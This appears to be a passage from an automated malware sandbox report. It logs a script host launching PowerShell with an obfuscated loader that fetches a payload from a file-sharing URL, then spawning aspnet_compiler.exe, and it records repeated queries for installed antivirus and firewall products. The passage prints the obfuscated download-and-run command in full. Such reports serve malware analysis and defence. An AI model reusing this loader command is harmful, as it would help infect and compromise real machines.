X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('*Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/PeIb5p/ffrtgH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('*Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0013~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
